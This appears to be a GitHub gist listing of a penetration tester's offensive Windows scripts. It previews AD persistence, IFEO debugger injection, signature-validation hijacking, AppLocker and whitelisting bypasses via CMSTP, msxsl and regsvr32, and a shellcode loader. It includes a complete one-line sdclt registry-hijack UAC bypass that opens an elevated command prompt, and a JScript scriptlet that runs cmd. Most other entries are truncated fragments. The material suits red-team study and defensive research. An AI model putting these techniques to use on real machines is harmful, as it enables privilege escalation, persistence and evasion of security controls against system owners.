Skip to content

Instantly share code, notes, and snippets.


netbiosX netbiosX

View GitHub Profile
netbiosX / userAccountControl.ps1
Created Jan 17, 2022
PowerShell script to automate domain persistence via the userAccountControl active directory attribute.
View userAccountControl.ps1
function Execute-userAccountControl
[System.String]$DomainFQDN = $ENV:USERDNSDOMAIN,
[System.String]$ComputerName = 'Pentestlab',
[System.String]$OSVersion = '10.0 (18363)',
[System.String]$OS = 'Windows 10 Enterprise',
[System.String]$DNSName = "$ComputerName.$DomainFQDN",
netbiosX / ImageFileExecutionOptions.ps1
Last active Apr 25, 2022
Image File Execution Options Injection - Persistence Technique
View ImageFileExecutionOptions.ps1
ImageFileExecutionOptions v1.0
License: GPLv3
Author: @netbiosX
# Image File Execution Options Injection Persistence Technique
function Persist-Debugger
netbiosX / pentestlab-dll.inf
Created May 7, 2018
CMSTP - Arbitrary DLL execution locally and remotely and SCT for AppLocker Bypass
View pentestlab-dll.inf
netbiosX / DigitalSignature-Hijack.ps1
Last active Apr 2, 2021
Hijack Digital Signatures and Bypass Authenticode Hash Validation
View DigitalSignature-Hijack.ps1
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
# Validate Digital Signature for PowerShell Scripts
function ValidateSignaturePS
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
netbiosX / customers.xml
Created Jul 5, 2017
Bypass Application Whitelisting via msxsl binary
View customers.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
netbiosX / Sdclt.ps1
Last active May 11, 2021
Bypass UAC via sdclt in Windows 10 systems
View Sdclt.ps1
This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10.
Author: @netbiosX
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
netbiosX / sdclt.bat
Created Jun 9, 2017
UAC Bypass in Windows 10 via sdclt - batch version
View sdclt.bat
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
netbiosX / FodhelperUACBypass.ps1
Last active Aug 3, 2022
Bypass UAC via Fodhelper binary in Windows 10 systems
View FodhelperUACBypass.ps1
This script can bypass User Access Control (UAC) via fodhelper.exe
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
Function : FodhelperUACBypass
File Name : FodhelperUACBypass.ps1
netbiosX / Shellcode.cs
Created Jun 6, 2017
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
netbiosX / pentestlab.sct
Created May 10, 2017
AppLocker - Regsvr32
View pentestlab.sct
<?XML version="1.0"?>
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - @netbiosX -->
<script language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");